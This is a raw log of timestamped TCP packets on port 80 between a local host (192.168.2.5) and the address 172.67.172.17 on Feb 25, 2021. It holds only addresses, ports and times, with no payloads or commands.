Feb 25, 2021 11:05:05.181529045 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.181550026 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.181569099 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.181583881 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.181600094 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.181610107 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.181615114 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.181647062 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.181678057 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.182565928 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.182586908 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.182601929 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.182617903 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.182636976 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.182640076 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.182653904 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.182687998 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.182714939 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.183238983 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.183257103 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.183271885 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.183288097 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.183301926 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.183320999 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.183327913 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.183391094 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.184108019 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.184129000 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.184142113 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.184158087 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.184171915 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.184181929 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.184187889 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.184227943 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.184257030 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.184992075 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.185013056 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.185024023 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.185039997 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.185055971 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.185058117 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.185071945 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.185127974 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.185800076 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.185822010 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.185838938 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.185854912 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.185869932 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.185874939 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.185885906 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.185916901 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.185944080 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.186644077 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.186661005 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.186676979 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.186691999 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.186711073 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.186728001 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.186732054 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.186784983 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.187542915 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.187565088 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.187597990 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.187608004 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.187609911 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.187618017 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.187628031 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.187691927 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.188350916 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.188364983 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.188376904 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.188394070 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.188410044 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.188426018 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.188437939 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.188463926 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.188509941 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.189172983 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.189191103 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.189209938 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.189229965 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.189241886 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.189244032 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.189249039 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.189313889 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.190063000 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.190073013 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.190092087 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.190108061 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.190124989 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.190135002 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.190140963 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.190182924 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.190907001 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.190921068 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.190937042 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.190958977 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.190973997 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.190992117 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.190992117 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.191072941 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.191760063 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.191782951 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.191801071 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.191814899 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.191831112 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.191845894 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.191862106 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.191881895 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.192842960 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.192861080 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.192873955 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.192890882 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.192903042 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.192914963 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.192969084 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.193660975 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.193686962 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.193707943 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.193722963 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.193742037 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.193749905 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.193758965 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.193763018 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.193820953 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.195471048 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.195496082 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.195507050 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.195519924 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.195535898 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.195553064 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.195590019 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.195619106 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.197351933 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.197374105 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.197412968 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.197431087 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.197449923 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.197467089 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.197483063 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.197482109 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.197509050 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.197537899 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.199510098 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.199537992 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.199553967 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.199573040 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.199589968 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.199604034 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.199608088 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.199659109 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.200334072 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.200362921 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.200378895 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.200395107 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.200413942 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.200423956 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.200432062 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.200448036 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.200473070 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.200508118 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.200813055 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.200829983 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.200845957 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.200861931 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.200881004 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.200884104 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.200897932 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.200912952 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.200943947 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.201793909 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.201817989 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.201834917 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.201849937 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.201864958 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.201880932 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.201880932 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.201900959 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.201925039 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.201965094 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.202805042 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.202830076 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.202847004 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.202862024 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.202877998 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.202886105 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.202893019 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.202908993 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.202964067 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.203706026 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.203723907 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.203790903 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.203824997 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.203860998 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.203869104 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.203880072 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.203896999 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.203912020 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.203933001 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.203948975 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.203982115 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.204080105 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.204818010 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.204840899 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.204862118 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.204878092 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.204893112 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.204911947 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.204916000 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.204931974 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.204971075 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.205780983 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.205807924 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.205826998 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.205842972 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.205861092 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.205863953 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.205878973 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.205893993 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.205909967 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.205967903 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.206732035 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.206758022 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.206773996 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.206789970 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.206805944 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.206814051 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.206820965 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.206840992 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.206872940 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.207653046 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.207674980 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.207695007 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.207709074 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.207725048 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.207732916 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.207741022 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.207756996 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.207792044 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.208086014 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.208638906 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.208657980 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.208674908 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.208689928 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.208704948 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.208720922 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.208734989 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.208741903 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.208831072 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.209666967 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.209686041 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.209702015 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.209717989 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.209733009 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.209748030 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.209749937 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.209783077 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.210354090 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.210375071 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.210391998 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.210412979 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.210412979 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.210432053 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.210433006 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.210449934 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.210464954 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.210490942 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.210526943 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.211219072 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.211242914 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.211267948 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.211282969 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.211298943 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.211311102 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.211314917 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.211329937 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.211333036 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.211376905 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.212148905 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.212807894 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.213315010 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.213331938 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.213351965 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.213368893 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.213392973 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.213403940 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.213419914 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.213423967 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.213438034 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.213454008 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.213459015 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.213469982 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.213485956 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.213500977 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.213520050 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.213521004 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.213536978 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.213553905 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.213591099 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.213957071 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.213978052 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.213994026 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.214009047 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.214025021 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.214030981 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.214040995 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.214060068 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.214063883 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.214126110 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.214845896 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.214863062 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.214875937 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.214891911 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.214906931 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.214916945 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.214922905 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.214939117 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.214973927 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.215703964 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.215722084 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.215737104 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.215753078 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.215768099 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.215785027 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.215786934 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.215804100 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.215835094 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.215859890 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.216594934 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.216624022 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.216640949 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.216656923 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.216672897 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.216689110 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.216692924 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.216703892 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.216737032 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.217483997 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.217513084 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.217533112 CET	80	49727	172.67.172.17	192.168.2.5
